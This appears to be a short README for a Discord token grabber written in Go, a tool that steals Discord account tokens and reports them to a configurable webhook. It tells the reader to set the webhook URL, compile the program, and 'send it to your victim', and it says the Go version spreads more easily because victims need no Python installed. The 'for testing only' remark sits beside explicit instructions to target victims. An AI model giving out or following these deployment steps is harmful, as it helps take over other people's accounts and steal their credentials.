A Discord token grabber, this time written in Golang. This means it's simpler to compile an executable (for testing only!!) and send it. There are no worries about obfuscation or the victim needing Python installed.
This was "inspired by" (copied from) wodxgod's Python version
- Install Go https://golang.org/dl
- Change WEBHOOK_URL and PING_ME if you'd like in the file.
- Compile the script
go build token-grabber.go
- Send it to your victim